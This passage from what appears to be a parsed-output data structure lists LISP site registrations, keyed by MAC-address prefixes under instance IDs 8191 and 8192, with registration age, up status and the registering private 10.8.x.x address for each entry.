"d0ec.35ff.9754/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"d0ec.35ff.5393/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"d4ad.71ff.85df/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"d4ad.71ff.867b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"d4ad.71ff.8d7d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"d4ad.71ff.9785/48": {
"last_register": "2d03h",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"d4ad.71ff.e682/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"d4ad.71ff.f88e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"d4ad.bdff.e91b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"d824.bdff.c2e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"d824.bdff.28d1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"dc8c.37ff.1148/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"dceb.94ff.60f7/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"dceb.94ff.6002/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"dceb.94ff.8fb4/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"dceb.94ff.a43e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"dceb.94ff.bba2/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"dceb.94ff.bbaf/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"dceb.94ff.6f7d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"dceb.94ff.7379/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"dceb.94ff.7475/48": {
"last_register": "00:04:52",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"dceb.94ff.8275/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"dceb.94ff.8303/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"dcf7.19ff.fd09/48": {
"last_register": "05:00:53",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"dcf7.19ff.4633/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"dcf7.19ff.46ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"dcf7.19ff.4756/48": {
"last_register": "03:00:56",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"dcf7.19ff.5509/48": {
"last_register": "05:17:50",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"dcf7.19ff.550c/48": {
"last_register": "03:19:12",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"dcf7.19ff.5db6/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"dcf7.19ff.6188/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"dcf7.19ff.631a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"e089.9dff.4cad/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"e0d1.73ff.47c6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"e4aa.5dff.9616/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"e4aa.5dff.961a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"e4aa.5dff.962a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"e4aa.5dff.9632/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"e4aa.5dff.964e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"e4aa.5dff.9782/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"e4aa.5dff.978a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"e4aa.5dff.9796/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"e4aa.5dff.98a5/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"e4aa.5dff.ef93/48": {
"last_register": "00:01:27",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"e4aa.5dff.f047/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"e4aa.5dff.f3ca/48": {
"last_register": "00:02:24",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"e4aa.5dff.05ec/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"e4aa.5dff.0856/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"e4c7.22ff.ea8a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.d1ca/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.de2f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.e069/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.3e7a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"e4c7.22ff.8f6a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
"e4c7.22ff.dd93/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.045c/48": {
"last_register": "1d03h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.05e7/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.13ef/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"e4c7.22ff.143c/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.166f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"e4c7.22ff.8239/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"e4c7.22ff.954c/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"e4c7.22ff.9565/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.9cd1/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"e4c7.22ff.9cd2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"e4c7.22ff.9c16/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.f56f/48": {
"last_register": "1d03h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.033f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"e4c7.22ff.267a/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"e4c7.22ff.3a51/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.4d45/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.3cf9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"e4c7.22ff.42d7/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"e4c7.22ff.47d9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"e4c7.22ff.290c/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.70c2/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"e4c7.22ff.7564/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"e840.40ff.001f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"e8ba.70ff.b489/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"e8ba.70ff.0643/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.97:26541",
"inst_id": 8191,
},
"ecc8.82ff.f783/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"f029.29ff.a0cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"f029.29ff.a19a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"f029.29ff.a753/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"f029.29ff.a953/48": {
"last_register": "00:02:19",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"f029.29ff.2548/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.179:15443",
"inst_id": 8191,
},
"f029.29ff.33cf/48": {
"last_register": "2d19h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"f07f.06ff.325c/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"f07f.06ff.3808/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"f07f.06ff.4062/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"f07f.06ff.44f9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"f07f.06ff.4614/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"f07f.06ff.47fa/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"f07f.06ff.4b72/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"f07f.06ff.5adc/48": {
"last_register": "19:20:03",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"f07f.06ff.660a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"f07f.06ff.a05e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"f07f.06ff.c8d6/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"f07f.06ff.c8e5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"f07f.06ff.c804/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"f41f.c2ff.477c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"f4ea.67ff.5bd7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"f4ea.67ff.5b46/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"f87b.20ff.c977/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"f8a5.c5ff.98c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.23:20011",
"inst_id": 8191,
},
"f8a5.c5ff.d71f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"f8a5.c5ff.e172/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"f8a5.c5ff.1dcb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"f8a5.c5ff.3a2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
}
},
},
8192: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8192,
},
"0002.d1ff.bb40/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0002.d1ff.2b65/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"000f.e5ff.80b5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"000f.e5ff.80b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"000f.e5ff.80bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"000f.e5ff.bf2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"000f.e5ff.bf2d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"000f.e5ff.bf46/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"000f.e5ff.bf4b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"000f.e5ff.bf4c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"000f.e5ff.e915/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"000f.e5ff.e91c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0017.5aff.b156/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8192,
},
"0017.5aff.b159/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8192,
},
"0017.5aff.b15b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0017.5aff.b161/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0017.5aff.b169/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8192,
},
"0017.5aff.b183/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0017.5aff.b184/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8192,
},
"0017.5aff.b187/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8192,
},
"0017.5aff.b18a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0017.5aff.c321/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8192,
},
"0017.5aff.c322/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"0017.5aff.c324/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8192,
},
"00a2.eeff.29cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"00a2.eeff.2ae3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"00a2.eeff.2a3f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"00a2.eeff.2a40/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"00a2.eeff.2a41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"00a2.eeff.2a42/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"00a2.eeff.2a43/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"00a2.eeff.2f8b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"00e0.c9ff.7bea/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"00e0.c9ff.9679/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"00e0.c9ff.a7b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.b120/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.b13f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.c007/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"0c75.bdff.c121/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"0c75.bdff.c150/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"0c75.bdff.c154/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"0c75.bdff.c164/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"0c75.bdff.4472/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.447e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.447f/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.448a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.448f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.4491/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.46f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4601/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4602/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4603/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.460b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8192,
},
"0c75.bdff.460c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.4610/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8192,
},
"0c75.bdff.4712/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8192,
},
"0c75.bdff.4713/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.4717/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.4719/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8192,
},
"0c75.bdff.471a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.471d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.471e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.4723/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4731/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8192,
},
"0c75.bdff.4732/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.4733/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.473a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.4741/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.4761/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8192,
},
"0c75.bdff.48d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.4b68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.4bac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.4da4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4dae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.4dc8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4dc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.4dca/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.00c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.01cd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.da7a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.dbfa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.3631/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.3b13/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.3b16/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.3b1a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.3b1b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.3cf1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8192,
},
"0c75.bdff.3cf4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8192,
},
"0c75.bdff.3d73/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.41bb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"0c75.bdff.79ed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0c75.bdff.83db/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"0c75.bdff.8311/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.8312/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.8315/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.8317/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.8318/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.8443/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.8447/48": {
